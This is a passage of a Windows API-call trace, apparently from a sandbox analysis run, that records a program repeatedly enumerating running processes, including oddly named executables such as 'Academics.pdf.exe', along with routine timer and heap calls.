th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0306.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0306.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0306.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0306.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0306.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0306.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0306.014] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.016] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.017] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0306.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.020] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0306.022] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0306.023] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0306.023] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0306.024] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.025] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0306.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0306.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0306.028] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0306.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0306.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0306.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0306.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0306.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0306.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0306.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0306.035] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0306.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0306.037] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0306.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0306.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0306.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0306.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0306.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0306.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0306.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0306.046] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0306.048] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0306.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0306.050] CloseHandle (hObject=0x294) returned 1 [0306.050] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0306.050] TranslateMessage (lpMsg=0x8bf970) returned 0 [0306.050] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0306.050] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0306.050] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0306.050] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0306.051] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0306.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0306.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0306.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0306.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0306.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0306.051] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0306.054] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0306.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0306.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0306.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0306.065] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0306.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0306.067] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0306.068] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0306.069] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0306.070] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.071] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.072] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0306.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.076] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.077] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0306.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0306.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0306.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0306.080] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0306.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0306.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0306.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0306.084] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0306.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0306.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0306.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0306.087] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0306.088] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0306.089] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 